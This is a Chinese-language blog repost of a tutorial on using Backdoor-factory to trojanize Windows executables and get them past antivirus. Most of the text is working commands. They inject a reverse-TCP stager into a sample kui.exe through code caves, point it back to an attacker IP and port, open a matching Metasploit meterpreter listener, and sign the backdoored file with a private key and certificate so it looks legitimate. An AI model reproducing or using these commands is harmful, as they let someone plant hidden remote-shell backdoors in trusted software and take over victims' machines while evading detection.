后门免杀工具-Backdoor-factory
发布时间:2021-02-19 21:29:29 所属栏目:系统 来源:网络整理
导读:副标题#e# 水一水最近玩的工具?弄dll注入的时候用到的 ? 介绍这款老工具?免杀效果一般。。但是简单实用 ? ? ? ?目录: 0x01?backdoor-factory简介 0x02?特点功能 0x03?具体参数使用 PS:后门添加私钥证书 ? ? https://tools.kali.org/exploitation-tools/bac
? ? 安装github都有。 ? ? ? ? 查看是否支持后门patch -f:指定测试程序 backdoor-factory -f kui.exe -S ? ? 指定的?shellcode patch backdoor-factory -f kui.exe -c -l 200 -c:code cave(代码裂缝) ? ? ? 查看支持哪些 payload 的注入: backdoor-factory -f kui.exe -s show ? ? ? 注入payload backdoor-factory -f kui.exe -s iat_reverse_tcp_stager_threaded -H 192.168.5.4 -P 4444 -s:选择使用 payload 类型 ? 选择了code cave的序号即可完成 ? msf监听: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.5.3 set lport 4444 exploit ? ? ? 对比原文件与生成文件MD5值md5sum ./kui.exe /root/kui.exe ? ? 常用参数-c:code cave(代码裂缝) -l:代码裂缝大小 -s:选择使用 payload 类型 -H:选择回连服务器地址 -P:回连服务器端口 -J:使用多代码裂缝注入 ? ? ? PS:看手册是可以添加自己的私钥证书在我们的马儿里面~~~ ? ?看了网上好像没人写这个 ? 使用:将私钥放在一个文件里: echo -n yourpassword > certs/passFile.txt ? 证书格式: signingCert.cer => certs/signingCert.cer signingPrivateKey.pem => certs/signingPrivateKey.pem ? 证书目录: certs ├── passFile.txt ├── signingPrivateKey.pem └── signingCert.cer ? ? 这时候我们需要使用C参数?生成win32pe代码裂缝插入私钥部分。 例子: ./backdoor.py -f kui.exe -s iat_reverse_tcp_inline -H 192.168.5.4 -P 4444 -m automatic -C (编辑:天津站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |